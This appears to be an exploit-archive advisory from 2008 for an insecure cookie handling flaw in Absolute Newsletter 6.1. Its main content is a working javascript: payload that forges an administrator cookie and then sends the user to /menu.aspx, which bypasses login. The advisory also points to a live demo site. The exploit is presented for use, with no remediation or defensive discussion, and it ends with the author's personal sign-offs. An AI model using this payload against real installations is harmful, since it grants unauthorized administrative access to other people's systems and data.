id: 3986
date: 10/31/2008
title: Absolute Newsletter 6.1 Insecure Cookie Handling Vulnerability
author: x0r
cves: 

==============================================================
Absolute Newsletter 6.1 Insecure Cookie Handling Vulnerability
==============================================================


-=======================================-
Autore: x0r
Cms = Absolute Newsletter 6.1
Bug: Insecure Cookie Handling Vulnerability
-=======================================-


Exploit:
javascript:document.cookie="xlaANLDEMOadmin=lvl=1&userid=1&usr=admin&s=TYPE
A SERIES OF RANDOM NUMBERS AND CHARACTERS HERE; path=/"; and go to
/menu.aspx

Live Demo: http://www.xigla.com/absolutenl/demo

[-] King Lion Gay
[+] Margherita Ti Amo...I'm Sorry...

_EOF_


#  0day.today [2023-03-23]  #